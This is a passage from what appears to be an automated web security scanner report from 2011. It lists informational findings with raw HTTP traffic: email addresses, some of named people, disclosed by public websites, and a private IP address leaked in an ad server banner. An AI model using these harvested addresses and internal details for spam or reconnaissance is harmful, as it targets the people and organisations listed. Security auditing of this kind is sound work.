
The following email addresses were disclosed in the response:

Feedback.Scout.DMCA@fox.com
Feedback.Scout@fox.com
Scout.DMCA@fox.com
Scout.Privacy@fox.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 01:26:00 GMT
Server: Microsoft-IIS/6.0
Server: Static2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 01:36:00 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 53554

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Terms of Service</title>
<meta http-equiv
...[SNIP]...
<a href="mailto:Feedback.Scout@fox.com&subject=Terms of Use Agreement">Feedback.Scout@fox.com</a>
...[SNIP]...
<a href="mailto:Scout.Privacy@fox.com">Scout.Privacy@fox.com</a>
...[SNIP]...
<b>mailto:Feedback.Scout@fox.com">Feedback.Scout@fox.com</a>
...[SNIP]...
<a href="mailto:Feedback.Scout.DMCA@fox.com&subject=Scout.com DMCA">Scout.DMCA@fox.com</a>
...[SNIP]...
<a href="mailto:Feedback.Scout.DMCA@fox.com">Scout.DMCA@fox.com</a>
...[SNIP]...
<a href="mailto:Feedback.Scout@fox.com">Feedback.Scout@fox.com</a>
...[SNIP]...
<a href="mailto:Feedback.Scout@fox.com">Feedback.Scout@fox.com</a>
...[SNIP]...

26.147. http://www.signonsandiego.com/news/blogs/science-quest/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.signonsandiego.com
Path:	/news/blogs/science-quest/

Issue detail

The following email address was disclosed in the response:

gary.robbins@uniontrib.com

Request

GET /news/blogs/science-quest/ HTTP/1.1
Host: www.signonsandiego.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

26.148. http://www.silverlight.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverlight.net
Path:	/

Issue detail

The following email address was disclosed in the response:

bud@dotnetchecks.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=1ev523nooswmg2mlyukyfwa0; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 17:15:30 GMT
Content-Length: 43355

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Home : The
...[SNIP]...
<a href="http://forums.silverlight.net/members/bud_4000_dotnetchecks.com.aspx" title="bud@dotnetchecks.com" class="online">
...[SNIP]...
<img src="http://i3.silverlight.net/avatar/anonymous.jpg?forceidenticon=True&dt=634319865000000000&cdn_id=12152010" alt="bud@dotnetchecks.com" onload="this.onload = null;LazyLoadAvatarImage(this,'http://i3.silverlight.net/avatar/bud@dotnetchecks.com.jpg?forceidenticon=False&dt=634319865000000000&cdn_id=12152010');" />
...[SNIP]...

26.149. http://www.silverlight.net/community/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverlight.net
Path:	/community/

Issue detail

The following email address was disclosed in the response:

bud@dotnetchecks.com

Request

GET /community/ HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/getstarted/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/showcase/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 76783
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 17:19:17 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Community
...[SNIP]...
<a href="http://forums.silverlight.net/members/bud_4000_dotnetchecks.com.aspx" title="bud@dotnetchecks.com" class="online">
...[SNIP]...
<img src="http://i3.silverlight.net/avatar/anonymous.jpg?forceidenticon=True&dt=634319865000000000&cdn_id=12152010" alt="bud@dotnetchecks.com" onload="this.onload = null;LazyLoadAvatarImage(this,'http://i3.silverlight.net/avatar/bud@dotnetchecks.com.jpg?forceidenticon=False&dt=634319865000000000&cdn_id=12152010');" />
...[SNIP]...

26.150. http://www.silverlight.net/privacy.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverlight.net
Path:	/privacy.aspx

Issue detail

The following email address was disclosed in the response:

mc_feedback_silverlightnet@neudesic.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19103
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:21:54 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Privacy St
...[SNIP]...
<a href="mailto:mc_feedback_silverlightnet@neudesic.com">mc_feedback_silverlightnet@neudesic.com </a>
...[SNIP]...

26.151. http://www.silverlight.net/resources/script/omniture/s_code_dotnet.min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverlight.net
Path:	/resources/script/omniture/s_code_dotnet.min.js

Issue detail

The following email address was disclosed in the response:

id@Ss.tc

Request

GET /resources/script/omniture/s_code_dotnet.min.js HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/showcase/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/learn/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/showcase/%2526ot%253DA

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Wed, 26 Jan 2011 22:07:17 GMT
Accept-Ranges: bytes
ETag: "4f6f7a65a5bdcb1:0",""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:33 GMT
Content-Length: 22031

function omniGetCookie(b){var d=document.cookie.indexOf(b+"=");if(d!=-1){var c=d+b.length+1;var a=document.cookie.indexOf(";",c);if(a==-1){a=document.cookie.length}return unescape(document.cookie.subs
...[SNIP]...
)`2'';@w=s.vs(sed)`5trk`F@w)#4=s.mr($1,(vt#Rt`avt)`n+s.hav()+q+(qs?qs:s.rq(^4)),0,id,ta);qs`i;`Xm('t')`5s.p_r)s.p_r(`U`b`i}^G(qs);^b`t(@v;`p@v`M^2,`H$I1',vb`G''`5#F)`I^z$z=`I^zeo=`I^z`W`q=`I^z`W^c`i`5!id@Ss.tc@1tc=1;s.flush`T()}`2#4`9tl`0o,t,n,vo`1;@X=$7o`U`W^c=t;s.`W`q=n;s.t(@v}`5pg){`I^zco`0o){`L^t\"_\",1,#U`2$7o)`9wd^zgs`0u$S`L^t#71,#U`2s.t()`9wd^zdc`0u$S`L^t#7#U`2s.t()}}@A=(`I`P`g`8`4$5s@p0`Ud=^9;s.b=s.
...[SNIP]...

26.152. http://www.silverlight.net/termsofuse.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverlight.net
Path:	/termsofuse.aspx

Issue detail

The following email addresses were disclosed in the response:

abuse@hotmail.com
homepage@microsoft.com
hotmailprivacy@hotmail.com
piracy@microsoft.com
support@hotmail.com
webmaster@redacted

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 49831
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:21:49 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Terms Of U
...[SNIP]...
<a href="mailto:homepage@microsoft.com" mce_href="mailto:homepage@microsoft.com">homepage@microsoft.com</a>
...[SNIP]...
<a href="mailto:webmaster@redacted" mce_href="mailto:webmaster@redacted">webmaster@redacted</a>
...[SNIP]...
<a href="mailto:support@hotmail.com" mce_href="mailto:support@hotmail.com">support@hotmail.com</a>
...[SNIP]...
<a href="mailto:abuse@hotmail.com" mce_href="mailto:abuse@hotmail.com">abuse@hotmail.com</a> or <a href="mailto:hotmailprivacy@hotmail.com" mce_href="mailto:hotmailprivacy@hotmail.com">hotmailprivacy@hotmail.com</a>
...[SNIP]...
<a href="mailto:piracy@microsoft.com" mce_href="mailto:piracy@microsoft.com">piracy@microsoft.com</a>
...[SNIP]...

26.153. http://www.spacedaily.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.spacedaily.com
Path:	/

Issue detail

The following email address was disclosed in the response:

info@spacemedianetwork.com

Request

GET / HTTP/1.1
Host: www.spacedaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

26.154. http://www.spacepolitics.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.spacepolitics.com
Path:	/

Issue detail

The following email address was disclosed in the response:

jeff@spacepolitics.com

Request

GET / HTTP/1.1
Host: www.spacepolitics.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:19:09 GMT
Server: Apache
X-Pingback: http://www.spacepolitics.com/xmlrpc.php
X-Powered-By: PHP/5.2.17
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55172

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head profile="http://gmpg.org
...[SNIP]...
<a href="mailto:jeff@spacepolitics.com">
...[SNIP]...

26.155. http://www.thecaseforpluto.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.thecaseforpluto.com
Path:	/

Issue detail

The following email address was disclosed in the response:

alan@thecaseforpluto.com

Request

GET / HTTP/1.1
Host: www.thecaseforpluto.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Tue, 25 Jan 2011 07:17:09 GMT
Accept-Ranges: bytes
ETag: "4aa612e15fbccb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 03:19:26 GMT
Connection: close
Content-Length: 5067

<html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>The Case for Pluto</title>
<meta name="description" content=""The Case for Pluto" explor
...[SNIP]...
<a href="mailto:alan@thecaseforpluto.com">
...[SNIP]...

26.156. http://www.tigerdirect.com/applications/SearchTools/item-details.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tigerdirect.com
Path:	/applications/SearchTools/item-details.asp

Issue detail

The following email addresses were disclosed in the response:

TigerDirect@tigeronline.com
johnsmith@gmail.com

Request

GET /applications/SearchTools/item-details.asp HTTP/1.1
Host: www.tigerdirect.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIA01A
X-Powered-By: ASP.NET
Content-Length: 100748
Content-Type: text/html
Cache-Control: private
Date: Sun, 30 Jan 2011 01:24:06 GMT
Connection: close
Set-Cookie: pop%5Fcheck=active; expires=Mon, 28-Feb-2011 05:00:00 GMT; path=/
Set-Cookie: visited=tempyes; expires=Sun, 30-Jan-2011 05:00:00 GMT; path=/
Set-Cookie: DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&ItemDetailsBeta=Y&msProduct=1782290&msRandX=44; path=/
Set-Cookie: SRVR=WEBX10%2D08A; path=/
Set-Cookie: Cart=Landing=http%3A%2F%2Fwww%2Etigerdirect%2Ecom%2Fapplications%2FSearchTools%2Fitem%2Ddetails%2Easp&Referer=; path=/
Set-Cookie: SessionId=2683290720110129202406173193214243; expires=Sun, 29-Jan-2012 05:00:00 GMT; path=/
Set-Cookie: SRCCODE=WEB1101; expires=Mon, 28-Feb-2011 05:00:00 GMT; path=/
Set-Cookie: SSLB=0; path=/; domain=.tigerdirect.com




<input type="hidden" name="hPayMthdBB" value="False" />
<SCRIPT LANGUAGE="javascript">
popWinGen = "";
function loadWindowGen(newTarget, newWidth, ne
...[SNIP]...
er your e-mail address in the Box');
fld.focus();
return false;
} else if (filter.test(fld.value) == false) {
alert('Sorry, please enter a valid e-mail address, for example, johnsmith@gmail.com');
fld.focus();
return false;
} else {
return true;
}
}

function get_random()
{
var ranNum= Math.floor(Math.random()*4);
   return ranNum;
}

function getaQuot
...[SNIP]...
ument.ccExForm.email;
       var at="@"
       var dot="."
       var lat=str.indexOf(at)
       var lstr=str.length
       var ldot=str.indexOf(dot)
       alertxr = "Sorry, please enter a valid e-mail address, for example, johnsmith@gmail.com"

       if (str.indexOf(dot)==-1 || str.indexOf(dot)==0 || str.indexOf(dot)==lstr){
        alert(alertxr);
           lightbox("open");
           emailID.focus();
        return false
       }

        if (str.indexOf(at,(
...[SNIP]...
alid email confirmation, please allow up to 2-4 business days to receive your $10 discount via email. Must follow instructions within the email to qualify. To ensure delivery to your inbox, please add TigerDirect@tigeronline.com to your address book.
</div>
...[SNIP]...
alid email confirmation, please allow up to 2-4 business days to receive your $10 discount via email. Must follow instructions within the email to qualify. To ensure delivery to your inbox, please add TigerDirect@tigeronline.com to your address book.
</div>
...[SNIP]...

26.157. http://www.w3.org/TR/1999/REC-html401-19991224/strict.dtd previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.w3.org
Path:	/TR/1999/REC-html401-19991224/strict.dtd

Issue detail

The following email addresses were disclosed in the response:

dsr@w3.org
ij@w3.org
lehors@w3.org

Request

GET /TR/1999/REC-html401-19991224/strict.dtd HTTP/1.1
Host: www.w3.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:25:54 GMT
Server: Apache/2
Content-Location: strict.dtd.raw
Vary: negotiate,accept-encoding,User-Agent
TCN: choice
Last-Modified: Fri, 24 Dec 1999 23:37:48 GMT
ETag: "8720-35c741aef8b00;475d1b7cb20c0"
Accept-Ranges: bytes
Content-Length: 34592
Cache-Control: max-age=31536000
Expires: Sun, 29 Jan 2012 23:25:54 GMT
P3P: policyref="http://www.w3.org/2001/05/P3P/p3p.xml"
Connection: close
Content-Type: text/plain

<!--
This is HTML 4.01 Strict DTD, which excludes the presentation
attributes and elements that W3C expects to phase out as
support for style sheets matures. Authors should use the Stric
...[SNIP]...
<dsr@w3.org>
...[SNIP]...
<lehors@w3.org>
...[SNIP]...
<ij@w3.org>
...[SNIP]...

26.158. http://www.w3.org/TR/html4/strict.dtd previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.w3.org
Path:	/TR/html4/strict.dtd

Issue detail

The following email addresses were disclosed in the response:

dsr@w3.org
ij@w3.org
lehors@w3.org

Request

GET /TR/html4/strict.dtd HTTP/1.1
Host: www.w3.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:40:26 GMT
Server: Apache/2
Content-Location: strict.dtd.raw
Vary: negotiate,accept-encoding,User-Agent
TCN: choice
Last-Modified: Fri, 24 Dec 1999 23:37:48 GMT
ETag: "8720-35c741aef8b00;475d1b7cb20c0"
Accept-Ranges: bytes
Content-Length: 34592
Cache-Control: max-age=7776000
Expires: Fri, 29 Apr 2011 23:40:26 GMT
P3P: policyref="http://www.w3.org/2001/05/P3P/p3p.xml"
Connection: close
Content-Type: text/plain

<!--
This is HTML 4.01 Strict DTD, which excludes the presentation
attributes and elements that W3C expects to phase out as
support for style sheets matures. Authors should use the Stric
...[SNIP]...
<dsr@w3.org>
...[SNIP]...
<lehors@w3.org>
...[SNIP]...
<ij@w3.org>
...[SNIP]...

27. Private IP addresses disclosed previous next
There are 81 instances of this issue:

http://atl.whitepages.com//AFTRSERVER/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link/ATCI=1294100002-3786607
http://atl.whitepages.com/AFTRSERVER/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link
http://atl.whitepages.com/IMPCNT/ccid=58230/AAMSZ=top_rail/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS
http://atl.whitepages.com/IMPCNT/ccid=58255/AAMSZ=landscape_module/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS
http://atl.whitepages.com/IMPCNT/ccid=58284/AAMSZ=bottom_rail/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS
http://atl.whitepages.com/IMPCNT/ccid=60680/AAMSZ=med_rect/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS
http://atl.whitepages.com/LSERVER/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link
http://atl.whitepages.com/accipiter/adclick/CID=0000e5bbb2c762f700000000/AAMSZ=endemic_module/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/
http://atl.whitepages.com/accipiter/adclick/CID=fffffffcfffffffcfffffffc/AAMSZ=custom_panel/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/
http://atl.whitepages.com/accipiter/adclick/CID=fffffffcfffffffcfffffffc/AAMSZ=teaser_link/ATCI=1294100002-3786607/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/
http://atl.whitepages.com/adclick/CID=0000e376b2c762f700000000/relocate=/
http://atl.whitepages.com/adclick/CID=0000ed08b2c762f700000000/relocate=
http://atl.whitepages.com/adclick/CID=0000ed08b2c762f700000000/relocate=/
http://atl.whitepages.com/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link
http://college.scout.com/
http://collegebasketball.scout.com/
http://collegefootball.scout.com/
http://content.scout.com/a.z
http://digg.com/search
http://digg.com/search
http://digg.com/search
http://digg.com/search
http://jcfootball.scout.com/
http://mlb.scout.com/
http://msn.whitepages.com/static/common/endemic.js
http://news.discovery.com/
http://news.discovery.com/
http://preps.scout.com/
http://profootball.scout.com/
http://recruiting.scout.com/
http://recruiting.scout.com/a.z
http://recruiting.scout.com/a.z
http://recruiting.scout.com/a.z
http://recruiting.scout.com/a.z
http://recruiting.scout.com/a.z
http://rss.scout.com/rss.aspx
http://rss.scout.com/rss.aspx
http://scouthoops.scout.com/
https://secure.scout.com/a.z
https://secure.scout.com/a.z
https://secure.scout.com/a.z
https://secure.scout.com/a.z
http://stackoverflow.com/
http://stackoverflow.com/questions
http://www.msnbc.redacted/
http://www.msnbc.redacted/id/24780215/ns/technology_and_science-games
http://www.msnbc.redacted/id/3032072/ns/business
http://www.msnbc.redacted/id/3032076/ns/health
http://www.msnbc.redacted/id/3032118/ns/technology_and_science
http://www.msnbc.redacted/id/3032507/ns/world_news
http://www.msnbc.redacted/id/3032525/ns/us_news
http://www.msnbc.redacted/id/3032553/ns/politics
http://www.msnbc.redacted/id/3053415/
http://www.msnbc.redacted/id/8004316/
http://www.scout.com/
http://www.scout.com/3/college-links.html
http://www.scout.com/3/college-links.html
http://www.scout.com/3/company.html
http://www.scout.com/3/company.html
http://www.scout.com/3/fair-use.html
http://www.scout.com/3/fair-use.html
http://www.scout.com/3/jobs.html
http://www.scout.com/3/jobs.html
http://www.scout.com/3/privacy-policy.html
http://www.scout.com/3/privacy-policy.html
http://www.scout.com/3/recruiting-links.html
http://www.scout.com/3/recruiting-links.html
http://www.scout.com/3/security-information.html
http://www.scout.com/3/terms-of-service.html
http://www.scout.com/3/terms-of-service.html
http://www.scout.com/a.z
http://www.scout.com/a.z
http://www.scout.com/a.z
http://www.scout.com/a.z
http://www.scout.com/a.z
http://www.scout.com/search.aspx
http://www.scout.com/search.aspx
http://www.scout.com/search.aspx
http://www.scout.com/search.aspx
http://www.scout.com/widgets/
http://www.unica.com/

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.

Summary

Severity:	Information
Confidence:	Certain
Host:	http://atl.whitepages.com
Path:	//AFTRSERVER/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link/ATCI=1294100002-3786607

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.3.8.1

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://atl.whitepages.com
Path:	/AFTRSERVER/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.3.8.1

Request

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.8.1 (Red Hat Linux Enterprise 4; X86)
Date: Sun, 30 Jan 2011 02:05:38 GMT
X-DirectServer: whitepg_DS0
Content-Type: application/x-javascript
Content-Length: 7034
Pragma: no-cache
Cache-control: no-cache
Set-Cookie: LE3=+6jd3r4Wa10014+9qUEKJKI6004G+4; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=atl.whitepages.com
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close

var AAMB1='<script language=\"JavaScript\" type=\"text/javascript\">\r\nvar cb = Math.random();\r\nvar d = document;\r\nd.write(\'<script language=\"JavaScript\" type=\"text/javascript\"\');\r\nd.writ
...[SNIP]...

27.3. http://atl.whitepages.com/IMPCNT/ccid=58230/AAMSZ=top_rail/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://atl.whitepages.com
Path:	/IMPCNT/ccid=58230/AAMSZ=top_rail/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.3.8.1

Request

GET /IMPCNT/ccid=58230/AAMSZ=top_rail/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS HTTP/1.1
Host: atl.whitepages.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wpn_session=xps_5070%3D1%26wp_stage%3Dproduction%26type%3Ddefault%26session_search_count%3D; GUID=00058525BF050D44401A5E1461626364; LE1=+6jd3r4Ya10014+4; LE2=+6jd3raZf10014+4; LE3=+6jd3r4Wa10014+4; LE4=+6jd3rKba10014+4; AA002=1294100002-3786607

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.8.1 (Red Hat Linux Enterprise 4; X86)
Date: Sun, 30 Jan 2011 01:29:43 GMT
X-DirectServer: whitepg_DS1
Content-Type: image/gif
Content-Length: 43
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close

GIF89a.............!.......,...........D..;

27.4. http://atl.whitepages.com/IMPCNT/ccid=58255/AAMSZ=landscape_module/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://atl.whitepages.com
Path:	/IMPCNT/ccid=58255/AAMSZ=landscape_module/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.3.8.1

Request

GET /IMPCNT/ccid=58255/AAMSZ=landscape_module/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS HTTP/1.1
Host: atl.whitepages.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wpn_session=xps_5070%3D1%26wp_stage%3Dproduction%26type%3Ddefault%26session_search_count%3D; GUID=00058525BF050D44401A5E1461626364; LE1=+6jd3r4Ya10014+4; LE2=+6jd3raZf10014+4; LE3=+6jd3r4Wa10014+4; LE4=+6jd3rKba10014+4; AA002=1294100002-3786607; __qca=P0-1307497695-1296350983104; Sample=18

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.8.1 (Red Hat Linux Enterprise 4; X86)
Date: Sun, 30 Jan 2011 01:30:06 GMT
X-DirectServer: whitepg_DS4
Content-Type: image/gif
Content-Length: 43
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close

GIF89a.............!.......,...........D..;

27.5. http://atl.whitepages.com/IMPCNT/ccid=58284/AAMSZ=bottom_rail/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://atl.whitepages.com
Path:	/IMPCNT/ccid=58284/AAMSZ=bottom_rail/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.3.8.1

Request

